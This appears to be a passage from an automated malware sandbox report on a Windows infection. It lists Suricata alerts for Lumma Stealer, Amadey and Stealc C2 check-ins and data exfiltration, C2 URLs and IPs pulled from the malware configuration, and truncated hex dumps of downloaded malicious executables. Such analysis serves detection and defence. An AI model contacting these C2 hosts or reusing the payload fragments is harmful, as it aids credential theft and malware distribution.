                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50267 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50268 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50269 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50271 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50270 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50273 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50277 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50276 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50275 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50285 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49742 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49745 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49755 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49780 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49841 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49841 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49862 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49908 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49908 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49834 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49834 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49921 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49919 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50209 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50209 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50211 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50206 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50206 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50255 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50255 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50277 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49902 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49902 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50273 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50217 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50217 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50276 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50223 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50260 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50219 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50219 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50264 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50264 -> 172.67.179.109:443
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
                              Source: Malware configuration extractorURLs: cheapptaxysu.click
                              Source: Malware configuration extractorURLs: sustainskelet.lat
                              Source: Malware configuration extractorURLs: discokeyus.lat
                              Source: Malware configuration extractorURLs: energyaffai.lat
                              Source: Malware configuration extractorURLs: crosshuaht.lat
                              Source: Malware configuration extractorURLs: necklacebudi.lat
                              Source: Malware configuration extractorURLs: grannyejh.lat
                              Source: Malware configuration extractorURLs: aspecteirs.lat
                              Source: Malware configuration extractorURLs: rapeflowwj.lat
                              Source: Malware configuration extractorIPs: 185.215.113.43
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:20:23 GMTContent-Type: application/octet-streamContent-Length: 1880576Last-Modified: Wed, 18 Dec 2024 18:02:50 GMTConnection: keep-aliveETag: "67630e4a-1cb200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 30 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4a 00 00 04 00 00 69 eb 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2a 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 6e 75 7a 76 6c 68 65 00 30 1a 00 00 f0 2f 00 00 2e 1a 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 7a 75 74 74 61 6e 78 00 10 00 00 00 20 4a 00 00 04 00 00 00 8c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4a 00 00 22 00 00 00 90 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 13:20:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:20:31 GMTContent-Type: application/octet-streamContent-Length: 4450816Last-Modified: Thu, 19 Dec 2024 11:46:36 GMTConnection: keep-aliveETag: "6764079c-43ea00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9f 99 62 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 44 49 00 00 24 6c 00 00 32 00 00 00 a0 bd 00 00 10 00 00 00 60 49 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 bd 00 00 04 00 00 15 98 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 90 69 00 73 00 00 00 00 80 69 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 84 bd 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 83 bd 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 69 00 00 10 00 00 00 48 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 69 00 00 02 00 00 00 58 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 69 00 00 02 00 00 00 5a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 38 00 00 a0 69 00 00 02 00 00 00 5c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6f 75 75 6e 73 79 7a 00 70 1b 00 00 20 a2 00 00 66 1b 00 00 5e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6b 6b 67 66 65 67 6b 00 10 00 00 00 90 bd 00 00 04 00 00 00 c4 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 bd 00 00 22 00 00 00 c8 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:20:44 GMTContent-Type: application/octet-streamContent-Length: 1114112Last-Modified: Thu, 19 Dec 2024 03:43:46 GMTConnection: keep-aliveETag: "67639672-110000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 95 63 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 cc 10 00 00 32 00 00 00 00 00 00 ee ea 10 00 00 20 00 00 00 00 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 ea 10 00 57 00 00 00 00 00 11 00 48 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ca 10 00 00 20 00 00 00 cc 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 2f 00 00 00 00 11 00 00 30 00 00 00 ce 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 11 00 00 02 00 00 00 fe 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 ea 10 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 3c 10 00 a4 ad 00 00 03 00 00 00 4b 00 00 06 90 cc 00 00 60 70 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 59 3f a8 46 36 30 84 8d 99 35 b2 d7 ba 38 1a 04 e1 c1 34 7a 63 cb 3a 03 56 92 13 f5 e3 07 ce b0 b7 af 4e 86 30 c8 a0 a9 18 31 bb 9b aa d3 d6 97 4f 2a 18 53 9a e6 7e 04 d9 f6 cb a2 c0 0c f1 49 85 ff a2 70 52 05 b8 69 49 c0 d2 09 93 f6 80 50 6e 7d 9b 0e d8 a3 69 4a 21 42 48 8d 2b 6f 2f 53 ce de 79 6a a1 0e 91 38 54 27 cb 7d fa c0 ca 0f 79 ae 49 a7 6b 44 18 0d cd ef cf 27 f4 88 c7 1c f4 24 c4 36 fa f9 8d ca 7d ad 9c 77 5b db 20 29 e0 89 13 6a 80 07 5b bd 2d 16 d1 30 b8 af 9b bc 7c 7f 95 97 70 cc 12 c3 e3 68 5c 1f ff 4c 8a be b5 18 52 d9 54 96 7e 14 b4 9a 8f 1a 04 62 14 4b 86 68 b2 f1 85 12 0a 22 07 38 c7 73 60 29 e1 f6 9a 31 dd bf b1 13 20 c5 cc aa 98 9e 5b 69 26 ce 39 95 e8 9a 8a 81 a4 61 3f 19 46 03 89 4e 1d d7 98 7e f5 ff cd 5f 12 5e 7f 1b 8e 51 88 1e b8 db bc e6 34 33 f7 4c 97 80 01 81 c2 40 76 b3 89 e6 78 c5 ae 07 49 42 ed 34 de da f1 ba c2 0c 8a b7 f3 9a f3 f4 ac 7c bc 00 05 b9 9e c6 28 8a f1 f1 82 ed c7 cc a1 03 ab 7e 18 59 f7
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 13:20:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
